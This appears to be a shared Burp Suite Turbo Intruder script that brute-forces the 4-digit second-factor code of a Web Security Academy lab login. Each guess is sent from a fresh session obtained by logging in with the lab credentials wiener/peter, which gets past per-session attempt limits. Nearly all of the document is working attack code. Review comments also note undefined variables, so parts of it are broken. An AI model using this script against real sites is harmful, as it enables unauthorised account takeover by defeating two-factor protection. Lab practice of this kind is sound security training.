Created
August 17, 2023 15:26
Burpsuite - Turbo Intruder Example
import re | |
import time | |
# --- Tunable settings -------------------------------------------------------
# Endpoint handed to RequestEngine; the hostname is specific to one lab
# instance and is also repeated in the Host headers built by handleResponse.
url = 'https://0add0030040299378166d901002800a1.web-security-academy.net'

# Patterns used to pull the anti-CSRF token out of a login form and the
# session identifier out of a Cookie / Set-Cookie header.
re_csrf = r'name="csrf" value="([\w\d]+)"'
re_session = r'session=([\w\d]+)'

# Engine sizing: passed as concurrentConnections and requestsPerConnection.
max_concurrent = 5
max_thread = 10

# Upper bound of the seeding loop in queueRequests (xrange(1, req_count)).
req_count = 20

# Pause in seconds; the only use in the visible script is a commented-out
# time.sleep(delay) call.
delay = 1
def queueRequests(target, wordlists):
    """Create the request engine and seed it with the initial requests.

    target    -- object whose ``req`` attribute holds the base request
                 (labelled "GET /login" in the log line below).
    wordlists -- accepted for the Turbo Intruder callback signature; not
                 used here.

    The engine is stored in the module-level ``engine`` so handleResponse
    can queue the follow-up requests of each login flow.
    """
    global engine

    # Connection settings have to be calibrated per server; five parallel
    # connections were judged enough for this lab host.
    # NOTE(review): the original comment speaks of one request per
    # connection, but requestsPerConnection receives max_thread (10).
    engine = RequestEngine(
        endpoint=url,
        concurrentConnections=max_concurrent,
        requestsPerConnection=max_thread,
    )

    # Each seed request starts one login flow that handleResponse then
    # drives forward. xrange(1, req_count) yields req_count - 1 iterations.
    # No pause is applied between seeds: the time.sleep(delay) call in the
    # original script is commented out.
    for _ in xrange(1, req_count):
        print('1. GET /login Request')
        engine.queue(target.req, '')
def handleResponse(req, interesting):
    """Advance one login flow according to what the response contains.

    req         -- completed request; ``req.response`` is searched as text
                   and ``req.getRequest()`` gives the request that was sent.
    interesting -- part of the callback signature; not used here.

    The checks run in a fixed order and only the first match is acted on.
    Every security-code guess is sent from a session obtained by a fresh
    login, and a rejected guess simply starts another login, so an attempt
    limit tied to the session does not cap the total number of guesses;
    such a cap has to be tracked per account on the server side.

    NOTE(review): ``iterable`` is read and incremented here but is not
    assigned anywhere in the visible script; ``table`` and ``target`` are
    not defined here either -- presumably supplied by the Turbo Intruder
    runtime, confirm. The re.search() results are used without a None
    check, so a response missing the expected token or cookie raises
    AttributeError.
    """
    global engine
    global iterable

    response = req.response

    if 'HTTP/1.1 302 Found' in response and 'Location: /my-account?id=wiener' in response:
        # Redirect to the account page: the security code was accepted.
        # Follow it with the session issued in this response.
        session_match = re.search(re_session, response)
        account_request = '''GET /my-account?id=wiener HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\n\r\n'''
        print('4. GET /my-account?id=wiener Request')
        engine.queue(account_request, session_match.group(1))

    elif 'Incorrect security code' in response:
        # The guess was rejected: record the response and begin a new
        # login flow from the first step.
        table.add(req)
        print('1. GET /login Request')
        engine.queue(target.req, '')

    elif 'Please enter your 4-digit security code' in response:
        # Code-entry form: the CSRF token comes from the page, the session
        # from the request that fetched it; the guess is the counter
        # zero-padded to four digits.
        csrf_match = re.search(re_csrf, response)
        session_match = re.search(re_session, req.getRequest())
        code_request = '''POST /login2 HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 51\r\n\r\ncsrf=%s&mfa-code=%s'''
        print('4. POST /login2 Request')
        engine.queue(
            code_request,
            [session_match.group(1), csrf_match.group(1), str(iterable).zfill(4)],
        )
        iterable += 1
        print('Iterable: ' + str(iterable))

    elif 'Location: /login2' in response:
        # Credentials accepted: a new session is issued and the flow moves
        # on to the page carrying the CSRF token for the code form.
        session_match = re.search(re_session, response)
        second_step_request = '''GET /login2 HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\n\r\n'''
        print('3. GET /login2 Request')
        engine.queue(second_step_request, session_match.group(1))

    elif '<form class=login-form method=POST action="/login">' in response:
        # Login form received: submit the fixed username and password with
        # the session and CSRF token taken from this response.
        session_match = re.search(re_session, response)
        csrf_match = re.search(re_csrf, response)
        login_request = '''POST /login HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 70\r\n\r\ncsrf=%s&username=wiener&password=peter'''
        print('2. POST /login Request')
        engine.queue(login_request, [session_match.group(1), csrf_match.group(1)])

    elif 'HTTP/1.1 200 OK' in response and 'Store credit: $100.00' in response:
        # Account page rendered: record the response as the final result.
        table.add(req)
        print('Win')

    return None
I give all credit to the following https://hackmag.com/security/burp-stepper-intruder/